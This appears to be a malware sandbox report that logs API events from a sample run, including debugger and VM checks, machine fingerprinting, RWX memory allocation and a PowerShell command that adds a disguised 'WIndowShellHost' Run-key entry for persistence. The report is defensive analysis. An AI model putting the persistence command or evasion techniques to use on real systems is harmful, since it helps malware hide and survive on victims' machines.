GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 8, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (41 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:35 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 8, 2022, 9:39 a.m.			0	0

Command line console output was observed (20 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: The term 'Remove' is not recognized as the name of a cmdlet, function, script f console_handle: 0x00000023	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: ile, or operable program. Check the spelling of the name, or if a path was incl console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: uded, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: At line:1 char:7 console_handle: 0x00000047	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: + Remove <<<< -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVer console_handle: 0x00000053	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: sion\Run' -Name 'WIndowShellHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Micros console_handle: 0x0000005f	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: oft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost' -Value 'C:\Users\test22 console_handle: 0x0000006b	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: \AppData\Roaming\WIndowShellHost\WIndowShellHost.exe' -PropertyType 'String' console_handle: 0x00000077	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Remove:String) [], CommandNotFo console_handle: 0x00000083	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: undException console_handle: 0x0000008f	1	1
WriteConsoleW Nov. 8, 2022, 9:35 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000009b	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\SOFTWAR console_handle: 0x000000b7	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: E\Microsoft\Windows\CurrentVersion\Run console_handle: 0x000000bb	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\SOFTWAR console_handle: 0x000000bf	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: E\Microsoft\Windows\CurrentVersion console_handle: 0x000000c3	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: PSChildName : Run console_handle: 0x000000c7	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: PSDrive : HKCU console_handle: 0x000000cb	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: PSProvider : Microsoft.PowerShell.Core\Registry console_handle: 0x000000cf	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: WIndowShellHost : C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHo console_handle: 0x000000d3	1	1
WriteConsoleW Nov. 8, 2022, 9:36 a.m.	buffer: st.exe console_handle: 0x000000d7	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 327 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674f78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006752f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006752f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006752f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006752f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006752f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006752f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006757b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00674ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00675b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000010b460 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 8, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b853dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 8, 2022, 9:35 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 2194 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00420000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00315000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0031b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00317000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00306000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0030a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00307000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x737e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73641000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ff1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75b71000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00660000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72591000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72592000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00496000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2816 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00711000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
